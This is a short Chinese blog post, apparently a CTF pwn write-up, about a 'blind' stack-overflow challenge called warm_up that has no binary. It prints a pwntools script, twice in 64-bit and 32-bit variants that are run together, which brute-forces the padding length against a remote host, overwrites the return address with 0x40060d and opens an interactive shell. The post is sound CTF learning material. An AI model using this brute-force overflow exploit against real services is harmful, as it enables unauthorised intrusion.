打卡:盲打题:warm_up

pwn-write-up
发布日期:   2023-01-05
更新日期:   2023-09-11
文章字数:   268
阅读时长:   1 分

盲打题warm_up

碰到这题的时候以为是题目忘记给附件了,竟然没有题目……后来搜了一下我才知道:我在做一种很新的题目……

在碰到这个没附件的题目的时候,就可以做好打盲打的准备了,很显然第一次碰到,一脸懵逼,故打卡记录

看了一下确实是什么反应都没有,输入%p没有任何回应,显然不是格式化字符串漏洞,这时考虑栈溢出。(都盲打了,什么也不知道不至于用什么保护机制来坑人吧)
给的0x40060d肯定是返回地址
学习下别人写的exp:

from pwn import *
sys = 0x40060d

for i in range(100):
	print(i)
	try:
  		io = remote("61.147.171.105",52590)
  		payload = b'A'*i + p64(sys)
  		io.recvuntil(">")
  		io.sendline(payload)
  		print(io.recv())
  		io.interactive()
	except:
  		io.close()from pwn import *
sys = 0x40060d

for i in range(100):
	print(i)
	try:
  		io = remote("61.147.171.105",52590)
  		payload = b'A'*i + p32(sys)
  		io.recvuntil(">")
  		io.sendline(payload)
  		print(io.recv())
  		io.interactive()
	except:
  		io.close()

两种代码那去试看看是32位还是64位

文章作者: 矢坕
文章链接: http://airunfive.github.io/2023/01/05/%E6%89%93%E5%8D%A1%EF%BC%9A%E7%9B%B2%E6%89%93%E9%A2%98-warm-up/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 矢坕 !
pwn-write-up
  目录